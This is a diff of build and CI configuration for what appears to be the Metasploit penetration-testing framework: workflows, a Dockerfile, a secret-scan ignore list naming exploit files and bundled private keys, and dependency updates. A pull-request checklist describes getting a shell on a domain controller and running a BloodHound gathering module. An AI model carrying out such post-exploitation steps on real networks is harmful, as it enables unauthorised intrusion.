POSTGRES_USER: postgres
POSTGRES_PASSWORD: postgres
options: >-
--health-cmd pg_isready
--health-cmd "pg_isready --username postgres"
--health-interval 10s
--health-timeout 5s
--health-retries 5
@@ -64,21 +60,15 @@ jobs:
fail-fast: true
matrix:
ruby:
- '3.0'
- '3.1'
- '3.2'
- '3.3.0-preview3'
- '3.3'
- '3.4'
os:
- ubuntu-20.04
- ubuntu-latest
exclude:
- { os: ubuntu-latest, ruby: '3.0' }
include:
- os: ubuntu-latest
ruby: '3.1'
test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DATASTORE_FALLBACKS=1'
- os: ubuntu-latest
ruby: '3.1'
ruby: '3.2'
test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1'
test_cmd:
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
@@ -89,6 +79,7 @@ jobs:
env:
RAILS_ENV: test
BUNDLE_WITHOUT: "coverage development pcap"
name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
steps:
@@ -96,11 +87,10 @@ jobs:
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v3
uses: actions/checkout@v4
- name: Setup Ruby
env:
BUNDLE_WITHOUT: "coverage development pcap"
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
uses: ruby/setup-ruby@v1
@@ -0,0 +1,98 @@
name: Weekly Data and External Tool Updater
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: write
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: write
repository-projects: none
security-events: none
statuses: none
on:
schedule:
# Run once a week (e.g., every Monday at 01:00 UTC)
- cron: '0 1 * * 1'
workflow_dispatch: # Allows manual triggering from the Actions tab
jobs:
update-data-files:
runs-on: ubuntu-latest
if: github.repository_owner == 'rapid7'
env:
BUNDLE_WITHOUT: "coverage development pcap"
strategy:
fail-fast: true
matrix:
ruby:
- '3.2'
steps:
- name: Install system dependencies
run: sudo apt-get install libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
- name: Run Ruby updater scripts
run: |
ruby tools/dev/update_wordpress_vulnerabilities.rb
ruby tools/dev/update_joomla_components.rb
ruby tools/dev/update_user_agent_strings.rb
ruby tools/dev/check_external_scripts.rb -u
- name: Remove vendor folder # prevent git from adding it
run: rm -rf vendor
- name: Create Pull Request
uses: peter-evans/create-pull-request@v7
with:
token: ${{ secrets.GITHUB_TOKEN }}
commit-message: Update report
base: master
branch: weekly-updates
committer: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
author: github-actions[bot] <github-actions[bot]@users.noreply.github.com>
title: "Weekly Data Update"
draft: false
body: |
This pull request was created automatically by a GitHub Action to update data files and external scripts.
The following tools were run:
- ruby tools/dev/update_wordpress_vulnerabilities.rb
- ruby tools/dev/update_joomla_components.rb
- ruby tools/dev/update_user_agent_strings.rb
- ruby tools/dev/check_external_scripts.rb -u
## Verification
### Wordpress/Joomla Files
- [ ] Do a sanity check, do the additions look legit?
- [ ] Start `msfconsole`
- [ ] `use modules/auxiliary/scanner/http/wordpress_scanner`
- [ ] **Verify** it runs
### JTR Files
- [ ] Do a sanity check, do the additions look legit?
- [ ] See https://docs.metasploit.com/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#example-hashes for hashes and cracking
### SharpHound
- [ ] Start `msfconsole`
- [ ] get a shell on a DC or box connected to a dc
- [ ] `use post/windows/gather/bloodhound`
- [ ] `set session`
- [ ] `run`
- [ ] **Verify** it runs w/o erroring
- [ ] `set method disk`
- [ ] **Verify** it runs w/o erroring
+46
View File
@@ -0,0 +1,46 @@
06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:73
06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:76
06da60cade4d9a7aebf265a76a4e5b0a8636ee6a:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md:119
deabf9b1d846e4ced5dca20be5e21e8732762889:documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2023_22527.md:16
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.9.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.0.0_proxy:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.7.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.5.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.8.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.6.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.10.0_platform:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.1.0_proxy:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.4.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.2.0_collector:1
b3b1595ef4046f4923109e44f7d113ed0f45e079:data/exploits/CVE-2023-34039/id_rsa_vnera_keypair_6.3.0_collector:1
58f9a39f72c623ab337a6768b34dc32f06d8ae67:documentation/modules/exploit/unix/webapp/zoneminder_snapshots.md:60
686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
686d704b371da3545f21b281b4ee29f3863cd3b7:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:57
619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:58
619a46d45081c09c661da37a1b3665d8f82bc8d1:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:65
e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:86
e34ed10eca5b01a5d19ee6465eb0f336af5d77a4:documentation/modules/exploit/linux/http/apache_superset_cookie_sig_rce.md:93
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:7642
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8471
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:data/wordlists/flask_secret_keys.txt:8472
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:75
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.md:77
94657d317ba4ecaa7f58bfc227b7e4a0bbec167e:documentation/modules/auxiliary/gather/python_flask_cookie_signer.md:99
+5 -1
View File
@@ -1,4 +1,5 @@
adfoster-r7 <adfoster-r7@github> <alandavid_foster@rapid7.com>
adeherdt-r7 <adeherdt-r7@github> Arne De Herdt <arne_deherdt@rapid7.com>
bwatters-r7 <bwatters-r7@github> <bwatters@rapid7.com>
cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
cdoughty-r7 <cdoughty-r7@github> <chris_doughty@rapid7.com>
@@ -15,6 +16,8 @@ space-r7 <space-r7@github> <shelby_pace@rapid7.com>
todb-r7 <todb-r7@github> <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> <todb@metasploit.com>
todb-r7 <todb-r7@github> <todb@packetfu.com>
dledda-r7 <dledda-r7@github> <diego_ledda@rapid7.com>
msutovsky-r7 <msutovsky-r7@github> <martin_sutovsky@rapid7.com>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@@ -119,6 +122,7 @@ m-1-k-3 <m-1-k-3@github> Michael Messner <devnull@s3cur1ty.de>
Meatballs1 <Meatballs1@github> <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> <Meatballs1@users.noreply.github.com>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
mwalas-r7 <mwalas-r7@github> <marcin_walas@rapid7.com>
net-ninja <net-ninja@github.com> Steven Seeley <steventhomasseeley@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
@@ -183,4 +187,4 @@ Jenkins Bot <jenkins@rapid7.com> Jenkins <jenkins@rapid7.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> URI Assassin <tabassassin@metasploit.com>
+1 -1
View File
@@ -9,7 +9,7 @@
# inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.6
TargetRubyVersion: 2.7
SuggestExtensions: false
NewCops: disable
+1 -1
View File
@@ -1 +1 @@
3.0.5
3.2.5
+9
View File
@@ -0,0 +1,9 @@
version: v1.25.0
ignore: {}
patch: {}
exclude:
global:
# exclude unit tests which contain hard coded passwords and encrypting keys for testing purposes.
- spec/
# exclude the source code to local exploits and utilities which have to be written in a particular way to exploit the vulnerabilities that we're targeting.
- external/source/
+10 -10
View File
@@ -1,7 +1,8 @@
FROM ruby:3.1.4-alpine3.18 AS builder
FROM ruby:3.2.5-alpine3.20 AS builder
LABEL maintainer="Rapid7"
ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
ARG BUNDLER_FORCE_CLEAN="true"
ENV APP_HOME=/usr/src/metasploit-framework
ENV TOOLS_HOME=/usr/src/tools
ENV BUNDLE_IGNORE_MESSAGES="true"
@@ -33,8 +34,11 @@ RUN apk add --no-cache \
go \
&& echo "gem: --no-document" > /etc/gemrc \
&& gem update --system \
&& bundle config $BUNDLER_ARGS \
&& bundle config $BUNDLER_CONFIG_ARGS \
&& bundle install --jobs=8 \
&& if [ "${BUNDLER_FORCE_CLEAN}" == "true" ]; then \
bundle clean --force; \
fi \
# temp fix for https://github.com/bundler/bundler/issues/6680
&& rm -rf /usr/local/bundle/cache \
# needed so non root users can read content of the bundle
@@ -49,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
cd go/src && \
./make.bash
FROM ruby:3.1.4-alpine3.18
FROM ruby:3.2.5-alpine3.20
LABEL maintainer="Rapid7"
ARG TARGETARCH
@@ -61,8 +65,8 @@ ENV METASPLOIT_GROUP=metasploit
# used for the copy command
RUN addgroup -S $METASPLOIT_GROUP
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
RUN apk add --no-cache curl bash sqlite-libs nmap nmap-scripts nmap-nselibs \
postgresql-libs python3 py3-pip py3-impacket py3-requests ncurses libcap su-exec alpine-sdk \
openssl-dev nasm
RUN\
if [ "${TARGETARCH}" = "arm64" ];\
@@ -70,7 +74,6 @@ RUN\
else apk add --no-cache mingw-w64-gcc;\
fi
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -82,9 +85,6 @@ RUN chown -R root:metasploit $APP_HOME/
RUN chmod 664 $APP_HOME/Gemfile.lock
RUN gem update --system
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
RUN pip install impacket
RUN pip install requests
ENV GOPATH=$TOOLS_HOME/go
ENV GOROOT=$TOOLS_HOME/bin/go
+212 -180
View File
@@ -1,7 +1,9 @@
PATH
remote: .
specs:
metasploit-framework (6.3.56)
metasploit-framework (6.4.52)
aarch64
abbrev
actionpack (~> 7.0.0)
activerecord (~> 7.0.0)
activesupport (~> 7.0.0)
@@ -10,20 +12,30 @@ PATH
aws-sdk-iam
aws-sdk-s3
aws-sdk-ssm
base64
bcrypt
bcrypt_pbkdf
benchmark
bigdecimal
bootsnap
bson
chunky_png
concurrent-ruby (= 1.3.4)
csv
dnsruby
drb
ed25519
elftools
em-http-request
eventmachine
faker
faraday
faraday (= 2.7.11)
faraday-retry
faye-websocket
ffi (< 1.17.0)
fiddle
filesize
getoptlong
hrr_rb_ssh-ed25519
http-cookie
irb (~> 1.7.4)
@@ -33,22 +45,25 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 2.0.165)
metasploit-payloads (= 2.0.189)
metasploit_data_models
metasploit_payloads-mettle (= 1.0.26)
metasploit_payloads-mettle (= 1.0.35)
mqtt
msgpack (~> 1.6.0)
mutex_m
nessus_rest
net-imap
net-ldap
net-sftp
net-smtp
net-ssh
network_interface
nexpose
nokogiri (~> 1.14.0)
nokogiri
octokit (~> 4.0)
openssl-ccm
openvas-omp
ostruct
packetfu
patch_finder
pcaprub
@@ -56,7 +71,7 @@ PATH
pg
puma
railties
rasn1
rasn1 (= 0.13.0)
rb-readline
recog
redcarpet
@@ -81,11 +96,11 @@ PATH
rex-zip
ruby-macho
ruby-mysql
ruby_smb (~> 3.3.0)
ruby_smb (~> 3.3.3)
rubyntlm
rubyzip
sinatra
sqlite3
sqlite3 (= 1.7.3)
sshkey
swagger-blocks
thin
@@ -103,128 +118,139 @@ PATH
GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.1.0)
actionpack (7.0.8)
actionview (= 7.0.8)
activesupport (= 7.0.8)
Ascii85 (1.1.1)
aarch64 (2.1.0)
racc (~> 1.6)
abbrev (0.1.2)
actionpack (7.0.8.6)
actionview (= 7.0.8.6)
activesupport (= 7.0.8.6)
rack (~> 2.0, >= 2.2.4)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.2.0)
actionview (7.0.8)
activesupport (= 7.0.8)
actionview (7.0.8.6)
activesupport (= 7.0.8.6)
builder (~> 3.1)
erubi (~> 1.4)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.1, >= 1.2.0)
activemodel (7.0.8)
activesupport (= 7.0.8)
activerecord (7.0.8)
activemodel (= 7.0.8)
activesupport (= 7.0.8)
activesupport (7.0.8)
activemodel (7.0.8.6)
activesupport (= 7.0.8.6)
activerecord (7.0.8.6)
activemodel (= 7.0.8.6)
activesupport (= 7.0.8.6)
activesupport (7.0.8.6)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 1.6, < 2)
minitest (>= 5.1)
tzinfo (~> 2.0)
addressable (2.8.5)
public_suffix (>= 2.0.2, < 6.0)
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
afm (0.2.2)
allure-rspec (2.23.0)
allure-ruby-commons (= 2.23.0)
allure-rspec (2.24.5)
allure-ruby-commons (= 2.24.5)
rspec-core (>= 3.8, < 4)
allure-ruby-commons (2.23.0)
allure-ruby-commons (2.24.5)
mime-types (>= 3.3, < 4)
require_all (>= 2, < 4)
rspec-expectations (~> 3.12)
uuid (>= 2.3, < 3)
arel-helpers (2.14.0)
arel-helpers (2.15.0)
activerecord (>= 3.1.0, < 8)
ast (2.4.2)
aws-eventstream (1.2.0)
aws-partitions (1.834.0)
aws-sdk-core (3.185.1)
aws-eventstream (~> 1, >= 1.0.2)
aws-partitions (~> 1, >= 1.651.0)
aws-sigv4 (~> 1.5)
aws-eventstream (1.3.0)
aws-partitions (1.999.0)
aws-sdk-core (3.211.0)
aws-eventstream (~> 1, >= 1.3.0)
aws-partitions (~> 1, >= 1.992.0)
aws-sigv4 (~> 1.9)
jmespath (~> 1, >= 1.6.1)
aws-sdk-ec2 (1.411.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-ec2instanceconnect (1.34.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.87.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.72.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.136.0)
aws-sdk-core (~> 3, >= 3.181.0)
aws-sdk-ec2 (1.486.0)
aws-sdk-core (~> 3, >= 3.210.0)
aws-sigv4 (~> 1.5)
aws-sdk-ec2instanceconnect (1.52.0)
aws-sdk-core (~> 3, >= 3.210.0)
aws-sigv4 (~> 1.5)
aws-sdk-iam (1.112.0)
aws-sdk-core (~> 3, >= 3.210.0)
aws-sigv4 (~> 1.5)
aws-sdk-kms (1.95.0)
aws-sdk-core (~> 3, >= 3.210.0)
aws-sigv4 (~> 1.5)
aws-sdk-s3 (1.169.0)
aws-sdk-core (~> 3, >= 3.210.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.6)
aws-sdk-ssm (1.158.0)
aws-sdk-core (~> 3, >= 3.184.0)
aws-sigv4 (~> 1.1)
aws-sigv4 (1.6.0)
aws-sigv4 (~> 1.5)
aws-sdk-ssm (1.183.0)
aws-sdk-core (~> 3, >= 3.210.0)
aws-sigv4 (~> 1.5)
aws-sigv4 (1.10.1)
aws-eventstream (~> 1, >= 1.0.2)
base64 (0.1.1)
bcrypt (3.1.19)
bcrypt_pbkdf (1.1.0)
base64 (0.2.0)
bcrypt (3.1.20)
bcrypt_pbkdf (1.1.1)
benchmark (0.4.0)
bigdecimal (3.1.8)
bindata (2.4.15)
bootsnap (1.16.0)
bootsnap (1.18.4)
msgpack (~> 1.2)
bson (4.15.0)
builder (3.2.4)
bson (5.0.1)
builder (3.3.0)
byebug (11.1.3)
chunky_png (1.4.0)
coderay (1.1.3)
concurrent-ruby (1.2.2)
cookiejar (0.3.3)
concurrent-ruby (1.3.4)
cookiejar (0.3.4)
crass (1.0.6)
csv (3.3.0)
daemons (1.4.1)
date (3.3.3)
date (3.4.1)
debug (1.8.0)
irb (>= 1.5.0)
reline (>= 0.3.1)
diff-lcs (1.5.0)
dnsruby (1.70.0)
diff-lcs (1.5.1)
dnsruby (1.72.2)
simpleidn (~> 0.2.1)
docile (1.4.0)
domain_name (0.5.20190701)
unf (>= 0.0.5, < 1.0.0)
docile (1.4.1)
domain_name (0.6.20240107)
drb (2.2.1)
ed25519 (1.3.0)
elftools (1.3.1)
bindata (~> 2)
em-http-request (1.1.7)
addressable (>= 2.3.4)
cookiejar (!= 0.3.1)
em-socksify (>= 0.3)
eventmachine (>= 1.0.3)
http_parser.rb (>= 0.6.0)
em-socksify (0.3.2)
em-socksify (0.3.3)
base64
eventmachine (>= 1.0.0.beta.4)
erubi (1.12.0)
erubi (1.13.0)
eventmachine (1.2.7)
factory_bot (6.2.1)
factory_bot (6.5.0)
activesupport (>= 5.0.0)
factory_bot_rails (6.2.0)
factory_bot (~> 6.2.0)
factory_bot_rails (6.4.4)
factory_bot (~> 6.5)
railties (>= 5.0.0)
faker (3.2.1)
faker (3.5.1)
i18n (>= 1.8.11, < 2)
faraday (2.7.11)
base64
faraday-net_http (>= 2.0, < 3.1)
ruby2_keywords (>= 0.0.4)
faraday-net_http (3.0.2)
faraday-retry (2.2.0)
faraday-retry (2.2.1)
faraday (~> 2.0)
faye-websocket (0.11.3)
eventmachine (>= 0.12.0)
websocket-driver (>= 0.5.1)
ffi (1.16.3)
fiddle (1.1.6)
filesize (0.2.0)
fivemat (1.3.7)
getoptlong (0.2.1)
gssapi (1.3.1)
ffi (>= 1.0.1)
gyoku (1.4.0)
@@ -235,37 +261,38 @@ GEM
hrr_rb_ssh-ed25519 (0.4.2)
ed25519 (~> 1.2)
hrr_rb_ssh (>= 0.4)
http-cookie (1.0.5)
http-cookie (1.0.7)
domain_name (~> 0.5)
http_parser.rb (0.8.0)
httpclient (2.8.3)
i18n (1.14.1)
i18n (1.14.6)
concurrent-ruby (~> 1.0)
io-console (0.6.0)
io-console (0.7.2)
irb (1.7.4)
reline (>= 0.3.6)
jmespath (1.6.2)
jsobfu (0.4.2)
rkelly-remix
json (2.6.3)
json (2.7.5)
language_server-protocol (3.17.0.3)
little-plugger (1.1.4)
logging (2.3.1)
logger (1.6.1)
logging (2.4.0)
little-plugger (~> 1.1)
multi_json (~> 1.14)
loofah (2.21.3)
loofah (2.23.1)
crass (~> 1.0.2)
nokogiri (>= 1.12.0)
macaddr (1.7.2)
systemu (~> 2.6.5)
memory_profiler (1.0.1)
memory_profiler (1.1.0)
metasm (1.0.5)
metasploit-concern (5.0.2)
metasploit-concern (5.0.3)
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
zeitwerk
metasploit-credential (6.0.7)
metasploit-credential (6.0.11)
metasploit-concern
metasploit-model
metasploit_data_models (>= 5.0.0)
@@ -279,8 +306,8 @@ GEM
activemodel (~> 7.0)
activesupport (~> 7.0)
railties (~> 7.0)
metasploit-payloads (2.0.165)
metasploit_data_models (6.0.3)
metasploit-payloads (2.0.189)
metasploit_data_models (6.0.6)
activerecord (~> 7.0)
activesupport (~> 7.0)
arel-helpers
@@ -290,68 +317,75 @@ GEM
railties (~> 7.0)
recog
webrick
metasploit_payloads-mettle (1.0.26)
method_source (1.0.0)
mime-types (3.5.1)
metasploit_payloads-mettle (1.0.35)
method_source (1.1.0)
mime-types (3.6.0)
logger
mime-types-data (~> 3.2015)
mime-types-data (3.2023.1003)
mini_portile2 (2.8.4)
minitest (5.20.0)
mime-types-data (3.2024.1001)
mini_portile2 (2.8.8)
minitest (5.25.1)
mqtt (0.6.0)
msgpack (1.6.1)
multi_json (1.15.0)
mustermann (3.0.0)
mustermann (3.0.3)
ruby2_keywords (~> 0.0.1)
mutex_m (0.2.0)
nessus_rest (0.1.6)
net-imap (0.4.0)
net-imap (0.5.0)
date
net-protocol
net-ldap (0.18.0)
net-protocol (0.2.1)
net-ldap (0.19.0)
net-protocol (0.2.2)
timeout
net-smtp (0.4.0)
net-sftp (4.0.0)
net-ssh (>= 5.0.0, < 8.0.0)
net-smtp (0.5.0)
net-protocol
net-ssh (7.2.0)
net-ssh (7.3.0)
network_interface (0.0.4)
nexpose (7.3.0)
nio4r (2.5.9)
nokogiri (1.14.5)
mini_portile2 (~> 2.8.0)
nio4r (2.7.4)
nokogiri (1.18.2)
mini_portile2 (~> 2.8.2)
racc (~> 1.4)
nori (2.6.0)
nori (2.7.1)
bigdecimal
octokit (4.25.1)
faraday (>= 1, < 3)
sawyer (~> 0.9)
openssl-ccm (1.2.3)
openssl-cmac (2.0.2)
openvas-omp (0.0.4)
ostruct (0.6.1)
packetfu (2.0.0)
pcaprub (~> 0.13.1)
parallel (1.23.0)
parser (3.2.2.4)
parallel (1.26.3)
parser (3.3.5.0)
ast (~> 2.4.1)
racc
patch_finder (1.0.2)
pcaprub (0.13.1)
pdf-reader (2.11.0)
pcaprub (0.13.3)
pdf-reader (2.12.0)
Ascii85 (~> 1.0)
afm (~> 0.2.1)
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (1.5.4)
pg (1.5.9)
pry (0.14.2)
coderay (~> 1.1)
method_source (~> 1.0)
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
public_suffix (5.0.3)
puma (6.4.0)
public_suffix (6.0.1)
puma (6.4.3)
nio4r (~> 2.0)
racc (1.7.1)
rack (2.2.8)
rack-protection (3.1.0)
racc (1.8.1)
rack (2.2.10)
rack-protection (3.2.0)
base64 (>= 0.1.0)
rack (~> 2.2, >= 2.2.4)
rack-test (2.1.0)
rack (>= 1.3)
@@ -362,26 +396,26 @@ GEM
rails-html-sanitizer (1.6.0)
loofah (~> 2.21)
nokogiri (~> 1.14)
railties (7.0.8)
actionpack (= 7.0.8)
activesupport (= 7.0.8)
railties (7.0.8.6)
actionpack (= 7.0.8.6)
activesupport (= 7.0.8.6)
method_source
rake (>= 12.2)
thor (~> 1.0)
zeitwerk (~> 2.5)
rainbow (3.1.1)
rake (13.0.6)
rasn1 (0.12.1)
rake (13.2.1)
rasn1 (0.13.0)
strptime (~> 0.2.5)
rb-readline (0.5.5)
recog (3.1.2)
recog (3.1.11)
nokogiri
redcarpet (3.6.0)
regexp_parser (2.8.1)
reline (0.4.1)
regexp_parser (2.9.2)
reline (0.5.10)
io-console (~> 0.5)
require_all (3.0.0)
rex-arch (0.1.15)
rex-arch (0.1.16)
rex-text
rex-bin_tools (0.1.9)
metasm
@@ -389,12 +423,12 @@ GEM
rex-core
rex-struct2
rex-text
rex-core (0.1.31)
rex-core (0.1.32)
rex-encoder (0.1.7)
metasm
rex-arch
rex-text
rex-exploitation (0.1.39)
rex-exploitation (0.1.40)
jsobfu
metasm
rex-arch
@@ -408,79 +442,79 @@ GEM
rex-arch
rex-ole (0.1.8)
rex-text
rex-powershell (0.1.99)
rex-powershell (0.1.100)
rex-random_identifier
rex-text
ruby-rc4
rex-random_identifier (0.1.11)
rex-random_identifier (0.1.13)
rex-text
rex-registry (0.1.5)
rex-rop_builder (0.1.5)
metasm
rex-core
rex-text
rex-socket (0.1.56)
rex-socket (0.1.58)
dnsruby
rex-core
rex-sslscan (0.1.10)
rex-core
rex-socket
rex-text
rex-struct2 (0.1.4)
rex-text (0.2.53)
rex-text (0.2.59)
rex-zip (0.1.5)
rex-text
rexml (3.2.6)
rexml (3.3.9)
rkelly-remix (0.0.7)
rspec (3.12.0)
rspec-core (~> 3.12.0)
rspec-expectations (~> 3.12.0)
rspec-mocks (~> 3.12.0)
rspec-core (3.12.2)
rspec-support (~> 3.12.0)
rspec-expectations (3.12.3)
rspec (3.13.0)
rspec-core (~> 3.13.0)
rspec-expectations (~> 3.13.0)
rspec-mocks (~> 3.13.0)
rspec-core (3.13.2)
rspec-support (~> 3.13.0)
rspec-expectations (3.13.3)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
rspec-mocks (3.12.6)
rspec-support (~> 3.13.0)
rspec-mocks (3.13.2)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.12.0)
